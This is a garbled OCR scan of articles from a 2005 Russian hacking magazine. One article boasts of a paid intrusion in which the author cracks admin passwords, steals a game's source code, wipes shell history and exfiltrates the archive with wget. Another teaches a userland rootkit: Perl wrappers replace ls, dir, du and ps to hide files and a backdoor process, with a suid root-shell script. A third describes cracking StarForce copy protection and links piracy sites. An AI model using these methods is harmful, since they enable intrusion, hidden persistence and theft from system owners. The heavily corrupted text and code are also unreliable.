рень мэйл-сервера, я был немного удивлен — структура каталогов обеих машин практи- 
чески была идентична! А фишка была вот в чем. Еще в начале этого взлома, сделав 
зііоттоипі, я увидел список монтированных систем, и среди них была/доезі (о папками 
обычных пользователей). Получалось, что почтовый сервер монтировал себе часть ката- 
логов с основной машины. К примеру, зайдя в /изг/Іюте, я мог увидеть практически пол- 
ностью содержимое админских папок! Списки пользователей были тоже идентичны, но, 
как выяснилось позже, не все аккаунты с основного сервера пускали на почтовую маши- 



I НЕМНОГО ОБ ЭТИХ САМЫХ 
«ЭКСПЛОЙТАХ» I 

Не секрет что в сети на многих секьюри- 
ти-сайтах ты можешь найти туеву хучу 
эксплойтов под различные сервисы и де- 
моны. Лично я думаю, что большинство из 
них умерли. Не потому, что код кривой 
или испорчен, а потому, что большинство 
уязвимостей, которые они эксплуатируют, 



безвозвратно устарели и практического 
применения им найти довольно сложно. 
Именно поэтому я всегда относился к ним 
довольно скептически (не ко всем ). Учи- 
тывая нынешние темпы разработчиков, 
можно сказать, что удачное эксплуати- 
рование системы с помощью паблик 
эксплойта это скорее исключение, чем 
правило. Хотя и в самом деле существуют 



некоторые уникальные тулзы ( виндовые 
КаНІ.с, Івазз.с, ВРС Зсап ), которые были 
и будут актуальны достаточно долго. 
Впрочем все вышесказанное не отно- 
ситься к эксплойтам для уязвимых веб- 
скриптов ( форумы, гостевые, галереи, 
и т.д) и является сугубо моим личным 
мнением. Соглашаться с ним или нет 
— решать только тебе. 



[хакер 08 [80] 05 > ВЗЛОМ 055 ] 
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проникновение к сердцу системы 
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строгий контроль доступа к файлам 



ну, зато все логины с таіі-сервера давали доступ к главному 
серваку, где хранились исходники. Значит на этой машине- 
двойнике есть шанс найти полезную инфу, которая позволит 
мне продвинуться дальше и поднять свои права до одного из 
зисіо'еров на Нр.аЬз.пеі, а потом, наконец-таки, получить завет- 
ный доступ к Нр-архиву. Цель была близка, и передо мной яв- 
но стояла одна задача — стать одним из зисіо'еров. 

[похищение исходников] Я, не торопясь, стал изучать катало- 
ги администраторов в/изг/Ііоте, хотя один юзер под ником «пос» 
все-таки поставил права 000 на свою папку. «Наверное, самый 
крутой», — подумал я. Хистори некоторых юзеров можно было 
свободно читать. Я даже нашел ошибки в командах — судоеры 
вводили не «зи», а «з», но тут же исправлялись, не вводя рутовый 
пасс :). Г рамотный читатель, наверное, заметит, что даже, если я и 
заимею рутовый пароль, то сделать «зи» не удастся, так как для 
этого нужно принадлежать к особой группе тііееі. Хотя с другой 
стороны, ничто не мешало попробовать залогиниться под рутом на 
ззіт, Геіпеі или Яр и, может быть, один из сервисных демонов раз- 
решал бы гооГ Іодіп. Но, к несчастью, все поиски оказались тщет- 
ными. Ни в одном из читабельных .Ітізіогу ничего полезного не бы- 
ло. Но в папке одного товарища, среди кучи ненужных документов, 
писем и объявлений, я увидел занимательный архив ѵаг.ідг, кото- 
рый нереально много весил. Я немного поколебался, но потом все- 
таки защел на тачку, предоставленную заказчиком (выделенка 
все же побыстрее моего тормознутого СЗО-соединения), и станда- 
ртным никсовым Йр-клиентом забрал архив. Получив сомнитель- 
ного вида файл, я временно отключился от сервера аЬз.пеІ, чтобы 
в спокойной обстановке изучить украденный архив. 

Внутри, действительно, находилась сжатая директория /ѵаг, но 
теперь я мог просматривать все подпапки в ней. Самым интерес- 
ным для меня был каталог Ьаскирз, который был недоступен на 
обеих ломаемых мащинах. Знаещь, что было там? МазГег.разз- 
ѵѵб.Ьак, датированный этим месяцем! На улице уже светало, поэ- 
тому нужно было как можно быстрее вскрыть пароли, слить сор- 
цы и сматываться из этой проклятой сети. Хотя я думал, что пе- 
ребрать хэши быстро не получиться (админский состав все-таки 
ставит на свои учетные записи непростые пассы), но вопреки 
всем пессимистическим взглядам, через 1 0 минут пасс пос'а рас- 
кололся. Несмотря на то, что человек позаботился о сохранности 
своих документов, грамотно выставив права доступа, он исполь- 
зовал элементарный пароль, который вызвал у меня улыбку. Не 
теряя ни минуты, я залогинился под пользователем пос и пере- 
шел в Мр/іпсотіпд. Проще всего получить доступ к нужным фай- 
лам: нужно было изменить стосі'ом права, залогиниться на фтп 
и скачать их. Но тут выяснилась одна фишка — владелец фай- 
лов был не я, а вообще левый пользователь поЬосІу (не путать с 
ѵѵеЬ-сервером, который был запущен под учетной записью ѵѵѵѵѵѵ). 
Нет — так нет, значит, можно содрать все файлы пос'у в домащ- 
ний каталог, заархивировать и транспортировать их на компью- 
тер заказчика. Имея на руках полный листинг файлов, командую: 

$ Іаг - 2 СІ /и$г/Іюте/пос/хагсЫѵе.Іаг.д 2 /йр/іпсотіпд/*. 2 Ір 

После этих нехитрых манипуляций я переместил архивчик в одну 
из самых глубоких папок. Чтобы наглые буржуи не знали, что я 
нащаманил в админской консоли, решено было снести хистори: 

$ есИо " "> .Иізіогу 

Теперь оставалось только скачать заветный и дорогостоящий архив 
на тачку к работодателю. Можно было юзать обычный Кр-клиент, но 
мне это показалось неудобным, и я рещил использовать ѵѵдеГ: 

# ѵѵдеі -йр-изег=и8егок -йр-разз=разз 
йр://йр.аЬз.пеІ//ра1ІіЛо/хагсІііѵе.1аг.д2& 

Все, процесс отправился жить в бэкграунде, а мы ждем переда- 
чи тяжеловесного кода. После успешного трансфера остава- 
лось дождаться нанявшего меня человека и отрапортовать, что 
миссия успешно выполнена. Через некоторое время я получил 
в свои руки эксклюзивную копию этой РПГ'шки и полную 
инструкцию установки от подельника — все, как и договарива- 
лись. Каждый получил то, что хотел — работодатель классную 
игрушку в свою коллекцию, а я — исходный код одного из са- 
мых популярных игровых \л/еЬ-проектов наших дней. На этой по- 
зитивной ноте спешу откланяться. Удачи, не попадайся :) @ 










Системный маскарад 



ни для кого НЕ СЕКРЕТ, ЧТО ПО- 
СЛЕ ПОЛУЧЕНИЯ РУТОВЫХ ПРАВ НА 
ВЗЛОМАННОМ СЕРВЕРЕ БОЛЬШИН- 
СТВО ХАКЕРОВ УСТАНАВЛИВАЮТ В 
СИСТЕМУ РУТКИТ, ЧТОБЫ ЗАКРЕ- 
ПИТЬСЯ НА МАШИНЕ И УДЕРЖАТЬ 
СВОЙ ДОСТУП КАК МОЖНО ДОЛЬ- 
ШЕ. ВООБЩЕ, В СЕТИ МОЖНО НАЙ- 



ТИ ДЕСЯТКИ РАЗНООБРАЗНЫХ ПРО- 
ЕКТОВ, МНОГИЕ ИЗ КОТОРЫХ ЯВЛЯ- 
ЮТСЯ НАСТОЯЩИМИ ПРОГРАММЕР- 
СКИМИ ШЕДЕВРАМИ И ПОЗВОЛЯЮТ 
ЗАМАСКИРОВАТЬ ПРИСУТСТВИЕ В 
СИСТЕМЕ ВЗЛОМЩИКА ТАКИМ ОБ- 
РАЗОМ, ЧТО ОБ ЭТОМ НЕ СМОЖЕТ 
ДОГАДАТЬСЯ ДАЖЕ ОПЫТНЫЙ АД- 



МИНИСТРАТОР. ОДНАКО ПРАКТИ- 
КА ПОКАЗЫВАЕТ, ЧТО НЕ ВСЕГДА 
ЦЕЛЕСООБРАЗНО УСТАНАВЛИ- 
ВАТЬ ТЯЖЕЛОВЕСНЫЕ РУТКИТЫ. 
ИНОГДА ДОСТАТОЧНО ИСПОЛЬЗО- 
ВАТЬ ЭЛЕМЕНТАРНЫЕ НАРАБОТКИ, 
КОТОРЫЕ МОЖЕТ РЕАЛИЗОВАТЬ 
каждый I Юрий Гольцев (игіу.доІ1зеѵ@гатЫег.ги) 



Создание элементарного 
неядерного руткита 



[начало начал] Для начала, думаю, следует разобраться, что вообще та- 
кое гооікіі и чем отличается ядерные руткиты от своих поп-кегпеі братьев. 
Если мыслить несколько абстрактно, то гооікіі — это средство, позволяю- 
щее замаскироваться в системе и удержать максимальные права при ак- 
тивном использовании взломанного компьютера. 

Ядерный руткит представляет собой подгружаемый модуль ядра систе- 
мы, который перехватывает системные вызовы пользователя, тем са- 
мым, контролируя и утаивая от администратора информацию о незакон- 
ных действиях. Обычно для разных ядер нужны свои руткиты, так как в 
разных системах используются различные адреса функций, которые кон- 
тролирует руткит. В данной же статье я поведаю о том, как написать не- 



Не забудь, после того, как 
все сценарии готовы, для 
их запуска тебе необходи- 
мо установить на них 
сбтоб 755, чтобы они ста- 
ли исполняемыми. 



сложный не ядерный руткит, скры- 
вающий от посторонних глаз свои 
собственные файлы, запущенные 
процессы и подключения к бэкдору. 

Сразу скажу, что мы не будем пе- 
реписывать такие утилиты, как Із, 
рз, пеізіаі для того, чтобы скрыть 

присутствие руткита в системе. Мы поступим намного проще, хотя это 
и совсем не безопасно — просто заменим эти утилиты скриптами, ко- 
торые будут обрабатывать передаваемые о консоли параметры, пере- 
направлять их оригинальной утилите, получать от нее ответ, обрабаты- 
вать его и выводить пользователю этот рафинированный результат. 
Первым делом необходимо все проанализировать и понять, с чего начи- 
нать работу. Я разделю создание руткита на три этапа: 





На нашем диске ты най- 
дешь полный комплект 
скриптов-оболочек, кото- 
рые можно использовать 
в качестве детского руткита. 
Однако практика показыва- 
ет, что в большинстве слу- 
чаев такого набора вполне 
достаточно, чтобы прятать- 
ся от админов месяцами. 





Ш Создание программ, скрывающих файлы руткита 

[Ц Создание программ, скрывающих процессы 

[Ц Написание нескольких скриптов для удобства работы о руткитом 



Итак, приступим. Как уже говорилось ранее, я не собираюсь переза- 
писывать утилиты, присутствующие в системе — я просто перемещу 
их в папку с неприметным названием, вроде /Ып/зувсН, оставив на 
их месте собственные скрипты-оболочки, которые будут управлять 
работой системных утилит. Разумеется, что такой сценарий не са- 
мый незаметный: любая антитроянная система мигом нас запалит. 
Поэтому надо понимать, что все, о чем я говорю, применимо для 
слабозащищенных серверов и представляет собой, прежде всего, 
просто интересную практику. 

[начнем программировать] Начнем с создания программ, скрываю- 
щих файлы будущего руткита. То есть нам нужно заменить такие утилиты, 
как Із , біг и би на собственные скрипты-обертки. Начнем с біг и би, посколь- 



ку их написание намного проще в данной категории. 

Зададим какой-нибудь переменной путь до папки, в которой лежат ориги- 
нальные утилиты и находятся некоторые файлы руткита: 

$кИ_ра№=7Ьіп/гооІкіГ; 

Эта строка, кстати, будет присутствовать почти во всех файлах нашего бу- 
дущего руткита. Первым делом необходимо написать код, который прове- 
ряет входящие аргументы. То есть если кто-то запустит утилиту біг с пара- 
метром /Ып/гооікіі, то в ответ ему выведется не атрибуты нащей папки, а со- 
общение, указывающиее на то, что папка не существует. Данный код до- 
статочно легко реализовать: 

$рѵѵс1='р\л/с1'; 

# определяем местонахождение пользователя в системных каталогах 
Іогеасіі $агд(@АВ6Ѵ) 

# проверяем каждый элемент массива параметров запуска 
{ 

і^(($агд ед ѴЬІп/гооІкіІ/”) II ($агд ед "гооІкіГ)&&($р\л/сІ ед ”Ып”)) 

# если аргумент равен /Ьіп/гооІкИ - 

# расположение нашей папки с руткитом, то выполняем следующее 
{ргіпі "сііг : $агд : N 0 зисИ ІІІе ог дігесйгу\п'';ехі{();} 

/выводим сообщение о том, что такой папки или файла не существует 
1 

После этого запускаем утилиту сІіг с переданными нашему скрипту 
параметрами: 

$сІіг=7Ьіп/гооІкіІ/сІіг @АВ6Ѵ"; 



[хакер 08 [80] 05 > ВЗЛОМ 059 ] 









[хакер 08 [ 80 ] 05 > ВЗЛОМ 060 ] 




[функция, изменяющая информацию 
о модифицированных файлах на исходную] 

$иЬ сііескі { 

@Іак=8рІІІ(/Ѵ/,$Іаке); #разбиваем по «/» путь до фэйковой тулзы 
(зса1аг(Шак)==3)|$1ак[3]=$1ак[2];$1ак[2]=$1ак[1]1 
П (($агд=~/$1ак[3]/)&&($р\л/с1 ед 7$1ак[1]/$Гак[2]") II ($агд ед "$1аке")) { 
$ді2=7Ып/гооІкіѴсІи $кіІ_ра№/$Іак[3]'; #достаем данные об оригинале 
@есІІ 2 =зрІІІ(ЛѴ,$сІІ 2 ); 

($с1и2=~/$^ак[3]/) { 

ргіпі ”$есІІ2[0]\1$Іак[3]\п";ехіІ(); } /выводим часть данных об оригинале 
($би 2 =="$ 1 аке“) { ргіпі "$ебІ 2 [ 0 ]\ 1 $ 1 аке\п"; ехіІ(); ) 

11 

Абсолютно такой же код можно реализовать и для Із. Только придется нем- 
ного подправить вывод уже фэйкового Із'а. Конечную реализацию ты най- 
дешь на нашем диске. 



ДЛЯ установки руткита нужны достойные привилегии 



в переменную $зЛег записались все 
данные, которые выдала утилита сііг 
после окончания своей работы. Те- 
перь перед тем, как выводить дан- 
ные пользователю, необходимо про- 
верить их на присутствие информа- 
ции о файлах нашего руткита. То 
есть, если юзер запустит утилиту сІіг 
для папки /Ып, в ответе он не дол- 
жен увидеть папку /і>/п/гаоМ. 

Мы остановились в нашем коде 
на том, что записали в перемен- 
ную $біг выходные данные о ути- 
литы біг. Теперь нужно эти дан- 
ные грамотно обработать и выве- 
сти пользователю: 

@діг 2 =зрІІІ(/ /,$Шг); /разрезаем $біг на несколько строк по 2 пробелам 
/начинаем проверку данных, и, если потребуется, замену: 

$соип1=0; 

Іогеасіі $діг 2 (@біг 2 ) 

{ 

$соип1-н-н; 

І1 ($гііг 2 =~ /$кіІ_раІІі/){$діг2=""1 / ищем «/Ьіп/гооікіі» 

І 1 (($6ІГ2 =~ /гооІкіІ/)&&($рѵѵд=="/Ьіп")){$діг2=""1 / ищем «гооікіі» 

І1 ($соипІ == зсаІаг(@діг 2 ) ){ргіпІ "$гііг 2 ";ехіІ();! 
ргіпі ”$діг 2 
1 

Что ж, могу тебя обрадовать — скрипт, управляющий выходными дан- 
ными о утилиты біг, готов. Осталось только переместить оригинальную 
утилиту в папку /Ьіп/гооГкіІ, а на ее место скопировать только что напи- 
санную нами программу. В дальнейшем, то есть после того, как все 
файлы нашего руткита будут готовы, ты должен их скрыть. В случае, 
если ты перл не знаешь, или знаешь очень плохо, то тебе понадобиться 
умение правильно программировать методом сору & разіе, и подпра- 
вить немного пути до программ :). 

[приступим к сіи] Переходим плавно к другой утилите — би. Описы- 
вать код целиком я не буду: алгоритм все уже поняли. Первым делом 
проверяем аргументы, далее запускаем программу, получаем ответ, об- 
рабатываем и выводим пользователю. Скелетом для би может послу- 
жить наш скрипт біг. А теперь основное: утилиты би и Із выдают инфор- 
мацию о размере файла в системе, а также некоторые индивидуальные 
для каждого файла атрибуты. То есть, если кто-нибудь выполнит коман- 
ду би /Ып или Із -I /Ып, то скорее всего наш руткит будет рассекречен, так 
как размеры всех переделанных нами утилит, естественно, будут не сов- 
падать о размерами оригиналов. Вот это нам и нужно скрыть. Начнем. 
Поскольку список скрываемых файлов — штука индивидуальная и подвиж- 
ная, то рационально создать универсальный код, чтобы в него в любой мо- 
мент можно было что-то быстро дописать, и главное, чтобы это все работа- 
ло. Поэтому первым делом в программе мы создадим массив с именами 
файлов, информацию о которых нужно изменить: 

@1аке_Іооіз=(7и5г/Ьіп/діг”,7изг/Ьіп/ди"); 

Затем напишем универсальную функцию для всех фэйковых файлов: 



[три части готовы] Итак, поздравляю, третья часть нашего руткита го- 
това. Сейчас мы перейдем к самому главному: к сокрытию наших процес- 
сов. Для этого нам необходимо сделать оболочку для рз: 

[оболочка ДЛЯ рз] 

/!/изг/Ьіп/регі 

$кіІ_раІІі=7Ьіп/гооІкіГ; 

$ргос=”кіодЬ”; /имя бэкдор-процесса в системе 
$ 1 = 0 ; 

@рз=7Ьіп/рз @АВ6Ѵ'; 

Іогеасй $агд(@АВ6Ѵ) I 
І1 ($агд=~/$ргос/) { $агд="" ) ! 

Іогеасй $рз(@рз) { 

І1 ($рз=~/$ргос/) { $рз="" 1 /прячем секретный процесс 
І1 ($рз=~/$кі1_раИі/){$рз=""1 /если запущенный процесс находится в 
секретной папке, прячем и его 

І1 (($рз=~/регі/) && ($рз=~/рз/)){$рз=""1 /при запуске /Ьіп/рз в системе 
появятся 2 новых процесса: регі Ліп/рз и рз. Убираем и их. 

І1 ($рз=~/$кі1_ра11іѴрз/) { 

@рз8=зрііІ(/ /,$рз); Іогеасіі $рзз(@рзз) /вместо /Ьіп/гооікіі/рз пишем 
просто «рз» 

Ш ($рзз=~/рз/){$рзз="рз"1$1++; 

І1 ($1==зсаіаг(@рзз)) Іргіпі "$рзз"1 
еізе {ргіпі "$рзз ";!1;1 
еізе {ргіпі "$рз";1! 

ВсеІ Фэйк-оболочка для рз готова к употреблению. Для удобства оста- 
лось лишь накатать скрипт для работы в системе, например, для бы- 
строго получения суидного шелла. Я решил не изобретать велосипед 
и просто приведу скрипт, который наколбаоил Форб в одном из про- 
шедших номеров: 

/!/изг/Ьіп/зиісІрегІ -У 
Іогеасіі $агд(@АВ6Ѵ) { 

І1 ($агд ед "-зиіб.гОх”) { 
ѵѵііііе (1){ 

ргіпі "[гооІ\@о\л/песІ] 
с1іотр($стд=<8ТОІМ>); 
ргіпі '$стд'; 1 
1 

еізе { ргіпі "N 0 зисіі Іііе ог дігес1огу\п"; ехі1() 1 
1 

Да, не забудь поставить бит ч-з этому сценарию :). 

[ничего не забыли?] Как видишь, ничего сложногоі Немного фанта- 
зии — и руткит готов. На диске ты можешь найти полный руткит-ком- 
плект, в состав которого входят скрипты-оболочки для утилит би, бІг, Із, 
(Іпб, Іосаіе, пеізіаі и рз. Так, ничего не забыли? 

Забыли, приятельі Представь, к примеру, что кто-то захочет сделать 
саі для /Ып/Ів, что произойдет в этом случае? Он увидит содержимое 
нашего перловго скрипта и в момент пропалит всю мазуі Для того, 
чтобы этого не произошло, необходимо просто скомпилировать наши 
перловые скрипты в бинарные файлы утилитой регісс, которая при- 
сутствует во всех ипіх-системах. Теперь, если кто-то сделает саі 
/Ып/Ів, то он увидит множество сомнительных символов, называемых 
в народе «зюзюками» 0 




внутренности скомпилированного 
перлового сценария не распола- 
гают к общению 
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ЮНИТЫ КРЕАТИФФ КОДИНГ УМІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20МЕ РЕРВУМ НЬЮСЫ 





Звездный отряд 



НА ЗЕМЛЮ НАДВИГАЕТСЯ ТЬМА. ЗВЕЗДНАЯ СИЛА НАСТУПАЕТ ПО ВСЕМ НАПРАВЛЕНИЯМ И ГРОЗИТ ЛИШИТЬ 
СКРОМНОГО ЗАРАБОТКА РОССИЙСКИХ ПИРАТОВ: ВСЕ БОЛЬШЕ И БОЛЬШЕ ПРОИЗВОДИТЕЛЕЙ КОМПЬЮТЕР- 
НЫХ ИГР ЗАЩИЩАЮТ СВОИ НОВИКИ СИЛОЙ ЗВЕЗД. ЗТАЯРОНСЕ СВОДИТ С УМА ТАМБОВСКИХ ПИРАТОВ: 
ОНИ НАЧИНАЮТ БИТЬСЯ ГОЛОВОЙ О КАФЕЛЬНЫЙ ПОЛ СВОИХ ЛАБОРАТОРИЙ, ПИТЬ МЕТИЛОВЫЙ СПИРТ, 
ПОДАВАТЬ ПЕТИЦИИ О ЗАЩИТЕ ИХ ПРАВ И ОРГАНИЗОВЫВАТЬ ПРОФСОЮЗЫ. ОДНАКО НЕ ВСЕ ТАК УЖ ПЛО- 
ХО, ПРИЯТЕЛЬ. СЕГОДНЯ МЫ НАУЧИМСЯ БОРОТЬСЯ СО ЗВЕЗДАМИ И РАЗБЕРЕМСЯ С ТЕМ, КАК ЖЕ ВЗЛАМЫ- 
ВАЕТСЯ ЛЕГЕНДАРНАЯ ЗАЩИТА I Крис Касперски ака мыщъх 



Принцип работы, узкие места 
и методы взлома ЗШгРогсе 

[что такое ЗІагРогсе?] 81агРогсе — это технология, предназначен- 
ная для защиты СО от копирования, основная идея которой заключает- 
ся в привязке к физической структуре спиральной дорожки и использо- 
вании целого набора низкоуровневых противохакерских средств. Вме- 
сто тупой проверки по схеме «свой — чужой» (которая элементарно от- 
ламывается заменой одного ітр'а), топологические характеристики дис- 
ка преобразуется в число, используемое для расшифровки основного 
тела программы, причем специальные защитные компоненты следят за 
тем, чтобы после расшифровки никто не снял дамп. 

Часть защитного кода сосредоточена в многомегабайтовом ргоіесі.сііі, 
часть — в драйверах, а часть — скомпилирована в промежуточный р-код, 
выполняемый на своем собственном интерпретаторе. Вся эта бодяга заме- 
шана на куче антиотладочных приемов, препятствующих как изучению за- 
щитного кода, так и эмуляции оригинального диска. 

[как это работает] Привязка к диску основана на измерении угла 
между секторами. Похожая техника использовалась еще во времена 8- 
битных компьютеров и дискет. Аналогичным образом работают СО-Сорз, 
ЗесигеНОМ и многие другие защитные механизмы, так что назвать идею 
разработчиков 8Р «революционной» очень трудно. Но это не помешало 
разработчикам запатентовать ее или, по крайней мере, объявить, что она 
запатентована. Впрочем, не будем углубляться в юридические дебри, 
а лучше перейдем к техническим деталям. 

Спиральная дорожка лазерных дисков очень похожа на грампластинку, 
только начинается не снаружи, а изнутри, то есть наматывается от центра 
к краю. Лазерная головка, удерживаемая в магнитном поле (примерно так 




же, как удерживается звуковая ка- 
тушка в акустических системах) 
движется на салазках поперек спи- 
ральной дорожки. Сама дорожка 
состоит из секторов о данными и ка- 
налов подкода. Номера секторов 
находятся как в заголовках самих 
секторов, так и в каналах подкода, 

«размазанных» вдоль спиральной 
дорожки. Для грубой наводки на 
требуемый сектор используются са- 
лазки и каналы подкода, а для точ- 
ной — отклонение в магнитном по- 
ле и секторные заголовки. 

Просто взять и измерить структуру 
спиральной дорожки нельзя, но мож- 
но сделать вот что. Допустим, голов- 
ка считывает сектор X, а следом за 
ним сектор У. Если угол ХОѴ, обра- 
зованный центром (О) диска и секто- 
рами X, V составляет -15 градусов, а 
сами сектора расположены в сосед- 
них витках спиральной дорожки, то 
приводу будет достаточно всего 
лишь немного отклонить головку и 
через мгновение сектор V сам упадет 

в его руки, как перезревшее яблоко, — диск ведь вращается! Если же угол со- 
ставляет менее 15 градусов, тогда за время перемещения головки, сектор V 
уже «уплывет» и приводу придется ждать целый оборот лазерного диска. 






Разработчики 5Р предъя- 
вляют довольно странные 
требования: при наличии 
ЮЕ- и 5С5І-приводов за- 
щищенный диск должен 
запускаться именно с ЮЕ- 
читалки. Это незаконно 
с любой точки зрения, тем 
более, что на обложке за- 
щищенного диска нет ни 
слова об зтом. Следова- 
тельно, ничто не мешает 
купить несколько дисков, 
поиграть, а потом прийти 
в магазин и аргументиро- 
ванно сказать: «Не работа- 
ют!». Пригрозив судом 
и обществом защиты прав 
потребителей, ты без про- 
блем сдашь диски и полу- 
чишь бабло назад. 

На нашем диске ты найдешь 
упомянутые в статье про- 
граммы и документацию. 




• Разработчики характеризу- Таким образом, замеряя время чте- 
ют себя как людей с хакер- ния различных пар секторов, мы мо- 
ским прошлым, сильных в жем приблизительно определить их 
взаимное расположение на спираль- 
ной дорожке. У каждой партии диска 
оно будет своим (ведь плотность сек- 
торов на 1 мм и крутизна спирали нео- 
динакова и варьируется от партии 
к партии). Чтобы побороть упреждаю- 
щее считывание (которым «страда- 
ют» многие приводы), защита должна 
читать сектора в порядке убывания их 
номеров. Также она должна измерять 
скорость вращения привода, чтобы, 
во-первых, определить постоянство 
временных замеров, а во-вторых, 
скорректировать формулу для вычи- 
сления угла. Чем быстрее вращается 
диск, тем скорее «уплывает» сектор. 
Именно так ЗІагРогсе и поступа- 
ет. Ниже приведен протокол ра- 
боты защиты, перехваченный программой ВизНоипб (при этом исполь- 
зовался 8С81-накопитель, поскольку с ЮЕ защита работает напрямую 
и программный перехват уже не спасает). 

Сначала защита выполняет профилировку поверхности, определяя время 
одного оборота, исходя из которого, будет рассчитываться допуск на откло- 
нение ключевых характеристик: 



Разработчики характеризу- 
ют себя как людей с хакер- 
ским прошлым, сильных в 
системном программиро- 
вании. Ребята и в самом 
деле знают тайники опера- 
ционной системы, как свой 
задний двор. Но вот про- 
граммировать умеют едва 
ли, ведь программирова- 
ние — это в первую оче- 
редь проектирование и 
учет рисков. Программа, 
ориентированная на массо- 
вое применение, просто не 
может пользоваться недо- 
кументированными воз- 
можностями и прочими 
приемами нетрадиционно- 
го программирования. 



[профилировка спиральной дорожки] 



I ссылки по ТЕМЕ I 

ѵѵтт.зіаііогсе.ги — официальный сайт разработчиков 8(агРогсе. 
ттѵѵ.датесоруѵѵогісі.сот — огромная коллекция взломанных 
игр с инструкциями по копированию (к сожалению, игры преи- 
мущественно английские). 

ШрМеІр.зіаііогсе.ги — очень большая коллекция русских игр, 
когда-то защищенных ЗІагРогсе, а сейчас раскулаченных, эк- 
спроприированных и приватизированных на все сто. 
Шр://ссІги.підМтаіІ.ги — образы некоторых защищенных ди- 
сков, пригодные для эмуляции, там же описание принципы ра- 
боты ЗІагРогсе и методы его копирования; 

АІсобоІ 120% — лучший копировщик всех времен и народов, 
частично справляющийся и со ЗІагРогсе: ѵѵѵѵѵѵ.аісоіюі-зо^і.сот 
АбѵапсесІ МОЗ ЕбКог — редактор образов для Алкоголя с воз- 
можностью сглаживания «дрыгательных» образов: сбги.підбіта- 
ІІ.ги/ссіги/ззіІкі/ргодз/тсізесІІ1/АсІѵапсесІМОЗЕсІІЮ55.гаг; 

□аегпоп Тооіз — эмулятор для работы с образами, созданны- 
ми Алкоголем, намного более компактен и в отличии от Алко- 
голя совершенно бесплатен: тѵѵѵѵ.даетоп-іооіз.сс 
Зіаг-Риск — программа для отключения ЮЕ-накопителей «на 
лету»: тѵѵт.ргоіесі-зіаііиск.ік 
форумы, посвященные взлому ЗІагРогсе: 
тѵѵ\/.]/ѵазт.ги/іогит/іпбех.рІір?асііоп=ѵіІігеасІ&іогит=5&іоріс=5457 
ѵѵѵт.сгаскІаЬ.ги/(/іпсІех.рІір?асНоп=ѵіІігеас1&^огит=1&іоріс=2060 
тѵ/ѵ/.іогит.ги-Ьоагб.сот/Іоріс.сді7іогит=55&іоріс=0519&зіагі=0 
ѵѵѵт.атИ.ги/(огита/зІюѵѵтез.азр?сизі_ісІ=1318&РадеМо=&радѳ=1 



049634 292ІТ18 
049611 192тз 
04960а 8.5тз 
049515 В.Зтз 
0495е0 8.5тз 
0495сЬ 8.5тз 



049566 8.5тз 
0495а1 8.5тз 
04958с 8.5тз 
049577 8.5тз 
049562 8.5тз 
049540 8.5тз 



049538 8.5тз 
049523 8.5тз 
04950е 8.7тз 

048е7е 8.1 тз 
048е69 8.2тз 



048е54 8.2тз 
048е31 8.2т$ 
048е2а 8.2тз 
048е15 8.2тз 
048е00 8.2тз 



(все номера секторов шестнадцатеричные) 

Как видно, каждый последующий номер на 150 меньше предыдущего (при- 
близительно столько секторов и содержится на данном витке спирали), а 
время чтения сектора колеблется от 8,1 до 8,7 тз. 

Затем защита делает некоторые несущественные операции, (то есть очень 
даже существенные, но не суть важные) и приступает к измерению углов. 
Вот так выглядит протокол для оригинального диска: 



Сразу бросается в глаза, что шаг убывания между секторами не остается 
постоянным, а плавно растет, то есть защита перебирает различные ком- 
бинации X и У, засекая в какой момент происходит «перескок» сектора, вы- 
нуждающий ждать целый оборот. В данном случае, он расположен между 
05ІСІСІСІ и 051662 секторами. Время доступа скачкообразно увеличивается 
с 5,2 тз дол 12 тз, то есть больше чем в два раза! 

А теперь посмотрим, как выглядит протокол обмена о копией: 



[измерение угла между секторами для копии диска] 



051с11е 29тз 
051с11а 7.3тз 
051с115 6.6тз 
051 йее 6.2тз 



051с1е6 5.5тз 
05ІСІСІСІ 5.1 тз 
05ІСІСІ2 4.7тз 
05ІСІС6 12тз 



051с1Ь9 Іітз 
051 Оаа Іітз 
051с19а Ютз 
051089 Ютз 



051с176 9.9т5 
051062 9.2тз 
05104с 8.8тз 
051035 8.0тз 



[измерения угла между секторами (оригинальный диск)] 



051 Оіе 25тз 
05101а 7.3тз 
051015 б.бтз 
051 Оее 6.2тз 



051 Оеб 5.5тз 
051000 5.2тз 
051002 12тз 
051 Осб 12тз 



051069 Іітз 
051 Оаа Іітз 
05109а Ютз 
051089 Ютз 



051076 9.9тз 
051062 9.1 т$ 
05104с 8.8тз 
051035 8.0тз 



I ЭЛЕГАНТНЫЙ МЕТОД I 

Существует (по крайней мере, теоретически) весьма эле- 
гантный метод взлома, основанный на генерации ключей. 
Действительно, ЗІагРогсе «оцифровывает» особенности 
структуры спиральной дорожки, генерирует знако-цифровую 
последовательность и сравнивает результат с введенным 
ключом. Естественно, это упрощенная схема и вместо про- 
стого сравнения используется криптография и прочие замо- 
рочки. Но суть остается прежней — если восстановить алго- 
ритм генерации, для скопированного диска, то можно вычи- 
слить свой ключ, который будет воспринят как правильный. 
Программы, защищенные по Кеуіезз технологии, не запра- 
шивают ключа, и он хранится на диске в Оаіа Ргерагег Ібепіі- 
Ііег'е в Ргітагу Ѵоіите езсгіріог'е, где легко может быть из- 
менен. Ковырнув ЗІагРогсе, я установил, что разобраться с 
алгоритмом генерации вполне реально, но... В новых вер- 
сиях он наверняка изменится, и тогда весь труд пойдет нас- 
марку. Кстати говоря, в Сети уже появилось множество 
предложений об услугах подобного рода. Причем за деньги, 
что сразу настораживает. И не зря! Все это сплошное кида- 
лово. Рабочего генератора пока нет ни у кого, так что не ве- 
дись на такую разводку. 



Вроде бы, все так же, как в прошлый раз, но, присмотревшись повнима- 
тельнее, можно заметить, что перескок происходит не межу 051666 и 
051662 секторами, как раньше, а между 051662 и 051 6с6, то есть на один 
шаг позже. Вот это-то и отличает скопированный диск от оригинала! 




[как это ломают] Скопировать 
физическую структуру спиральной 
дорожки нельзя. Во всяком случае, 
пока. Но кое-какие шаги в этом на- 
правлении уже сделаны. На рынке 
появились приводы с переменной 
плотностью записи (например, РІе- 
ХІОГ Ргетіит), правда, поддержи со 
стороны копировщиков еще нет. 

Также мне удалось создать экспери- 
ментальный копировщик, имитирую- 
щий структуру оригинальной дорож- 
ки, путем переупорядочивания сек- 
торных номеров, однако до закон- 
ченного продукта он так и не был до- 
веден. Имеются и другие идеи, но 
в долговременной перспективе все 
они нежизнеспособны и разработчи- 
ки 8Р их легко обойдут. 

Ну и ладно, идем дальше! Перед 
проверкой ключевых характеристик 

спиральной дорожки, защита выполняет профилировку привода, чтобы 
